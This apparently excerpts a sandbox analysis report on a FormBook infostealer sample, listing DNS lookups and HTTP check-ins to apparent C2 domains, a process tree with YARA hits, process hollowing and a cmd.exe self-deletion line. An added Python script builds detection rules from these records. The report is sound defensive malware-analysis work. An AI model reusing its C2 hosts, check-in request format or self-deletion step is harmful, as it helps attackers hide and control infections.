Jan 28, 2022 15:18:16.805891991 CET  192.168.2.5  8.8.8.8  0xc69e    Standard query (0)  www.inspectdecided.xyz  A (IP address)  IN (0x0001)
Jan 28, 2022 15:18:47.860148907 CET  192.168.2.5  8.8.8.8  0x15a6    Standard query (0)  www.fengyat.club        A (IP address)  IN (0x0001)
Jan 28, 2022 15:19:08.085529089 CET  192.168.2.5  8.8.8.8  0x900c    Standard query (0)  www.hstolchsjybyl.com   A (IP address)  IN (0x0001)
DNS Answers
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                    CName  Address         Type            Class
Jan 28, 2022 15:18:16.841569901 CET  8.8.8.8    192.168.2.5  0xc69e    No error (0)  www.inspectdecided.xyz         104.21.22.47    A (IP address)  IN (0x0001)
Jan 28, 2022 15:18:16.841569901 CET  8.8.8.8    192.168.2.5  0xc69e    No error (0)  www.inspectdecided.xyz         172.67.202.238  A (IP address)  IN (0x0001)
Jan 28, 2022 15:18:47.884793043 CET  8.8.8.8    192.168.2.5  0x15a6    No error (0)  www.fengyat.club               188.114.96.7    A (IP address)  IN (0x0001)
Jan 28, 2022 15:18:47.884793043 CET  8.8.8.8    192.168.2.5  0x15a6    No error (0)  www.fengyat.club               188.114.97.7    A (IP address)  IN (0x0001)
Jan 28, 2022 15:19:08.116527081 CET  8.8.8.8    192.168.2.5  0x900c    No error (0)  www.hstolchsjybyl.com          81.17.29.148    A (IP address)  IN (0x0001)
                                • www.inspectdecided.xyz
                                • www.fengyat.club
HTTP Packets
Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.5  49811        104.21.22.47    80                C:\Windows\explorer.exe

Timestamp: Jan 28, 2022 15:18:16.875929117 CET  kBytes transferred: 9817  Direction: OUT
GET /a83r/?v2=5jBLRl1pIZPlY&k2MLx=ZSxafiwoPrw2VCRk9gX3wlOewDINgI1JCq9hgmGWZWQPOxIps9jFRiFeHjLrjNblu9Aw HTTP/1.1
Host: www.inspectdecided.xyz
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Jan 28, 2022 15:18:16.932411909 CET  kBytes transferred: 9818  Direction: IN
HTTP/1.1 301 Moved Permanently
Date: Fri, 28 Jan 2022 14:18:16 GMT
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=3600
Expires: Fri, 28 Jan 2022 15:18:16 GMT
Location: https://www.inspectdecided.xyz/a83r/?v2=5jBLRl1pIZPlY&k2MLx=ZSxafiwoPrw2VCRk9gX3wlOewDINgI1JCq9hgmGWZWQPOxIps9jFRiFeHjLrjNblu9Aw
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fjqTa6KQsXdQRf6Ui81gv%2FixmDSEV7LuDmOzKiC%2BSgTrMTax57A58RTIGO7bxWx6f3I6LXJ%2Bt9JiP%2BcxtYw5hpNb38GcMN61qi%2BJq29xsG6njKpQu%2B2I3Dnqo94vapExWe%2FSNA0NCk%2Fx"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6d4ad95f8af492a8-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.5  49818        188.114.96.7    80                C:\Windows\explorer.exe

Timestamp: Jan 28, 2022 15:18:47.903491020 CET  kBytes transferred: 9853  Direction: OUT
GET /a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU++//65IFIgHpMHnqLlfGYboARBAcbNtYvQ&v2=5jBLRl1pIZPlY HTTP/1.1
Host: www.fengyat.club
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Jan 28, 2022 15:18:47.942751884 CET  kBytes transferred: 9854  Direction: IN
HTTP/1.1 301 Moved Permanently
Date: Fri, 28 Jan 2022 14:18:47 GMT
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=3600
Expires: Fri, 28 Jan 2022 15:18:47 GMT
Location: https://www.fengyat.club/a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU++//65IFIgHpMHnqLlfGYboARBAcbNtYvQ&v2=5jBLRl1pIZPlY
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mnoWGeHzpnVaxZkk%2BzzUERWAf6hGdgSOv0fX66e4lwZflgc8bI9nQQ6mHXVu3QTfAKTt77ZML%2Bck4mR9nM3JssBSwJuhoX157rCAbnDtk%2FWS9GMZxv%2FliRve1zQnmmJaKCAP"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6d4ada217e8c5c62-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0



                                Target ID:0
                                Start time:15:16:42
                                Start date:28/01/2022
                                Path:C:\Users\user\Desktop\triage_dropped_file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\triage_dropped_file.exe"
                                Imagebase:0xea0000
                                File size:408064 bytes
                                MD5 hash:F6EAACD1B39028130602EE0892E67663
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.284884958.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                Target ID:5
                                Start time:15:17:04
                                Start date:28/01/2022
                                Path:C:\Users\user\Desktop\triage_dropped_file.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\triage_dropped_file.exe
                                Imagebase:0x9a0000
                                File size:408064 bytes
                                MD5 hash:F6EAACD1B39028130602EE0892E67663
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                Target ID:12
                                Start time:15:17:07
                                Start date:28/01/2022
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff693d90000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                Target ID:20
                                Start time:15:17:39
                                Start date:28/01/2022
                                Path:C:\Windows\SysWOW64\autofmt.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\SysWOW64\autofmt.exe
                                Imagebase:0xed0000
                                File size:831488 bytes
                                MD5 hash:7FC345F685C2A58283872D851316ACC4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Target ID:21
                                Start time:15:17:40
                                Start date:28/01/2022
                                Path:C:\Windows\SysWOW64\netsh.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\netsh.exe
                                Imagebase:0x11f0000
                                File size:82944 bytes
                                MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                Target ID:22
                                Start time:15:17:44
                                Start date:28/01/2022
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Users\user\Desktop\triage_dropped_file.exe"
                                Imagebase:0x150000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:23
                                Start time:15:17:46
                                Start date:28/01/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ecfc0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
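The process list and the HTTP sessions carry the behavioral evidence behind the report's signatures: the sample starts a second copy of itself that is no longer managed code (Target 5, "C, C++ or other language", with FormBook Yara hits at its image base, which is the hollowed process), explorer.exe (Target 12) is the process that issues the check-in GETs, autofmt.exe and netsh.exe (Targets 20, 21) are launched with no arguments at all and netsh.exe ends up holding FormBook code in memory, and cmd.exe (Target 22) deletes the original file. Both check-ins reuse the path /a83r/ and the value v2=5jBLRl1pIZPlY against two different hosts, and both received only a Cloudflare 301 to HTTPS; no follow-up request is recorded on this page. The script below is an added example, not part of the Joe Sandbox report, that turns those observations into rules over records transcribed from the tables above. The process records are constructed from the Target ID blocks (parent process IDs are not shown on the page, so no parent/child rule is attempted); the `CHECKIN_URI` pattern describes the shape of this sample's two requests and is an assumption, not a general FormBook signature; the "bare system utility" rule is a heuristic for injection hosts.

```python
"""Behavioral triage over a sandbox process list and captured HTTP sessions.

Added example; not part of the Joe Sandbox report. Records are transcribed
from the tables on this page; the rules encode what those tables show.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed from the "Target ID" blocks above. Parent PIDs are not on the page.
PROCESSES = [
    {"id": 0, "path": "C:\\Users\\user\\Desktop\\triage_dropped_file.exe",
     "cmdline": '"C:\\Users\\user\\Desktop\\triage_dropped_file.exe"'},
    {"id": 5, "path": "C:\\Users\\user\\Desktop\\triage_dropped_file.exe",
     "cmdline": "C:\\Users\\user\\Desktop\\triage_dropped_file.exe"},
    {"id": 12, "path": "C:\\Windows\\explorer.exe", "cmdline": "C:\\Windows\\Explorer.EXE"},
    {"id": 20, "path": "C:\\Windows\\SysWOW64\\autofmt.exe", "cmdline": "C:\\Windows\\SysWOW64\\autofmt.exe"},
    {"id": 21, "path": "C:\\Windows\\SysWOW64\\netsh.exe", "cmdline": "C:\\Windows\\SysWOW64\\netsh.exe"},
    {"id": 22, "path": "C:\\Windows\\SysWOW64\\cmd.exe",
     "cmdline": '/c del "C:\\Users\\user\\Desktop\\triage_dropped_file.exe"'},
    {"id": 23, "path": "C:\\Windows\\System32\\conhost.exe",
     "cmdline": "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"},
]

# Constructed from the two HTTP sessions above; request lines are verbatim.
HTTP_SESSIONS = [
    {"process": "C:\\Windows\\explorer.exe", "dst": "104.21.22.47",
     "request": "GET /a83r/?v2=5jBLRl1pIZPlY&k2MLx=ZSxafiwoPrw2VCRk9gX3wlOewDINgI1JCq9hgmGWZWQPOxIps9jFRiFeHjLrjNblu9Aw HTTP/1.1\r\n"
                "Host: www.inspectdecided.xyz\r\nConnection: close\r\n\r\n" + "\x00" * 7},
    {"process": "C:\\Windows\\explorer.exe", "dst": "188.114.96.7",
     "request": "GET /a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU++//65IFIgHpMHnqLlfGYboARBAcbNtYvQ&v2=5jBLRl1pIZPlY HTTP/1.1\r\n"
                "Host: www.fengyat.club\r\nConnection: close\r\n\r\n" + "\x00" * 7},
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Shell hosts that have no business originating HTTP on a workstation.
NO_NET_PROCESSES = {"c:\\windows\\explorer.exe"}
SELF_DELETE = re.compile(r'^/c\s+del\s+"?(?P<target>[^"]+?)"?\s*$', re.I)
# Assumption derived from the two requests above: four-character directory, then
# short alphanumeric parameter names with opaque values. Not a general signature.
CHECKIN_URI = re.compile(r"^/[a-z0-9]{4}/\?[a-z0-9]+=[^&\s]+(?:&[a-z0-9]+=[^&\s]+)*$", re.I)


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def analyze(processes, sessions):
    """Return (rule, detail) findings; each rule maps to a signature in the report."""
    findings = []
    for p in processes:
        path = p["path"].lower()
        cmd = p["cmdline"].strip()
        m = SELF_DELETE.match(cmd)
        if path.endswith("\\cmd.exe") and m:
            findings.append(("self_delete", f"Target {p['id']}: cmd.exe deletes {m.group('target')}"))
        # A system utility started with an empty argument list does nothing useful
        # by itself; here it is the host the injected FormBook code runs in.
        if path.startswith(SYSTEM_DIRS) and cmd.strip('"').lower() == path:
            findings.append(("bare_system_utility", f"Target {p['id']}: {p['path']} started with no arguments"))
    seen = defaultdict(set)  # (artifact kind, value) -> hosts it was sent to
    for s in sessions:
        req = parse_request(s["request"])
        host = req["headers"].get("host", s["dst"])
        if s["process"].lower() in NO_NET_PROCESSES:
            findings.append(("system_process_http", f"{s['process']} -> {host} ({s['dst']})"))
        if req["method"] == "GET" and CHECKIN_URI.match(req["target"]):
            parts = urlsplit(req["target"])
            findings.append(("c2_checkin_uri", f"GET {parts.path} to {host}"))
            seen[("path", parts.path)].add(host)
            for name, value in parse_qsl(parts.query):
                seen[("param", f"{name}={value}")].add(host)
    # The same path or parameter value sent to several hosts is one implant
    # walking its C2 list, not unrelated browsing.
    for (kind, value), hosts in sorted(seen.items()):
        if len(hosts) >= 2:
            findings.append(("shared_c2_artifact", f"{kind} {value} reused for {sorted(hosts)}"))
    return findings


if __name__ == "__main__":
    for rule, detail in analyze(PROCESSES, HTTP_SESSIONS):
        print(f"[{rule}] {detail}")
```

Run on the records above this reports one self-deletion (Target 22), two argument-less system utilities (Targets 20 and 21), two explorer.exe HTTP sessions, two check-in URIs and two artifacts shared across both C2 hosts (the /a83r/ path and the v2 value). The third contacted host, www.hstolchsjybyl.com, appears only in the DNS and Snort tables, so it is outside these records; on live telemetry the same rules would take Sysmon or EDR process and network events as input.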

                                No disassembly